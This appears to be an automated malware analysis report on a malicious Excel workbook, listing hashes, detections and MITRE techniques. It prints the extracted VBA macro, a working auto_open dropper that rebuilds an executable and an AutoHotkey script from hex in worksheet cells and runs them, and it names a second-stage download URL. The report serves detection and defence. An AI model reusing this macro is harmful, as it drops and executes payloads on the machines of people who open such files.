Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 efe51c2453821310…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 1.57 MB
Created: 2019-03-29 08:00:47 UTC
Authoring application: Microsoft Excel 14.0300
First seen: 2019-05-16
MD5: 4dbe9dbfb53438d9ce410535355cd973
SHA-1: 816b013c8be6e5708690645964b5d442c085041e
SHA-256: efe51c2453821310c7a34dca3054021d0f6d453b7133c381d75e3140901efd12
Risk score: 248

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1105 Ingress Tool Transfer

The sample is a malicious Excel document containing VBA macros. The `auto_open` macro rebuilds two files, `AutoHotkeyU32.exe` and `AutoHotkeyU32.ahk`, from hex strings stored in worksheet cells (columns 24 and 25 of a sheet named " "), writes them to `C:\ProgramData\`, and then launches the executable with the `.ahk` script as its argument. The script also contains a URL, `http://185.70.186.145/7773/index.php`, which is likely used to download the second-stage payload. The `Shell()` call and the overall structure strongly indicate downloader or dropper functionality.

Heuristics (5)

  • ClamAV: Doc.Dropper.Agent-6940774-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6940774-0
  • VBA project inside OOXML (medium, OOXML_VBA, 2 related findings)
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • Auto_Open macro (high, OLE_VBA_AUTO)
    Auto_Open macro
  • Hidden worksheet (hidden) (low, OOXML_HIDDEN_SHEET)
    Excel workbook contains 1 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 3671 bytes
SHA-256: 5f3a998d478bf44c91b071c0f41ddb258586f79884ad675b66159d51369c7239

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "Module1"
Sub auto_open()
    Dim sh As Worksheet
    Dim rw As Range
    
    Set sh = Sheets(" ")
    Dim handle As Long
    handle = FreeFile
    Open "C:\ProgramData\AutoHotkeyU32.exe" For Binary As #1
    Dim hextext As String
    Dim bytes() As Byte
    ReDim bytes(0)
    Dim byteLength As Long
    For Each rw In sh.Rows
        hextext = sh.Cells(rw.Row, 24).Value
        If hextext = "" Then
            Exit For
        End If
    
        For y = 1 To Len(hextext)
            byteLength = UBound(bytes)
            ReDim Preserve bytes(byteLength + 1)
            bytes(byteLength) = Val("&h" & Mid(hextext, y, 2))
            
            y = y + 1
        Next y
    Next rw
    ReDim Preserve bytes(byteLength)
    Put #1, , bytes
    Close #1

    Set sh = Sheets(" ")
    handle = FreeFile
    Open "C:\ProgramData\AutoHotkeyU32.ahk" For Binary As #1
    ReDim bytes(0)
    For Each rw In sh.Rows
        hextext = sh.Cells(rw.Row, 25).Value
        If hextext = "" Then
            Exit For
        End If
    
        For y = 1 To Len(hextext)
            byteLength = UBound(bytes)
            ReDim Preserve bytes(byteLength + 1)
            bytes(byteLength) = Val("&h" & Mid(hextext, y, 2))
            
            y = y + 1
        Next y
    Next rw
    ReDim Preserve bytes(byteLength)
    Put #1, , bytes
    Close #1
    
    Dim strProgramName As String
    Dim strArgument As String

    strProgramName = "C:\ProgramData\AutoHotkeyU32.exe"
    strArgument = "C:\ProgramData\AutoHotkeyU32.ahk"

    Call Shell("""" & strProgramName & """ """ & strArgument & """", vbNormalFocus)
End Sub

Sub show_document()
   On Error Resume Next
   ActiveSheet.Shapes.SelectAll
   Selection.Delete
   On Error GoTo 0
End Sub

Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист6"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Worksheet____1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Workbook________"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Worksheet____6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: xl/vbaProject.bin
Size: 19456 bytes
SHA-256: 2d1d0c25ab0cf9bb897664cf245be7297a6435288f5bc23ca79892d3a4f5320e
Detection: ClamAV: Doc.Dropper.Agent-6940774-0
Obfuscation or payload: unlikely